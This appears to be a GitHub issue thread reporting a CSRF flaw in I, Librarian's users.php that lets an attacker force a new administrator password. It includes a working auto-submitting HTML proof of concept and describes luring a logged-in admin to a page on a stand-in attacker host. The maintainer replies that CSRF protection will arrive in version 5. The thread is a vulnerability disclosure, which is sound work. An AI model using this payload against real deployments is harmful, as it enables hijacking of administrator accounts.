CSRF to force new password for administrator

[xssssrf]

i-librarian/users.php

Line 138 in 9535753

if (!empty($_GET['force_password']) && !empty($_GET['id']) && !empty($_GET['new_password'])) {

CSRF vulnerability is present here,
It will allow an attacker to force updates the password of the admin whose id is "1".

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/Librarian/users.php">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="force&#95;password" value="Force&#32;Password" />
      <input type="hidden" name="new&#95;password" value="12345678" />
      <input type="submit" id="sub" />
    </form>
  </body>
  <script type="text/javascript">
    document.getElementById("sub").click();
  </script>
</html>

[mkucej]

Hmm, all those functions should only be accessible to super user. Thanks.

[xssssrf]

Ofcourse.
If the attacker sends the http://evil.me/poc.html to the administrator and the administrator logs in to the library, the password will be forced to change without the administrator's knowledge.

[mkucej]

Sure. I, Librarian does not have any CSRF countermeasures. We are working on an entirely new version that has CSRF mitigation. I am afraid we will not be adding CSRF protection to I, Librarian 4.

[mkucej]

In general, I, Librarian code is pretty old. It started before PHP5 existed, and Internet was a friendlier place. We decided for a complete rewrite for the fifth generation.

[mkucej]

CSRF protections will be enabled by default for all POST requests in 5.0.0.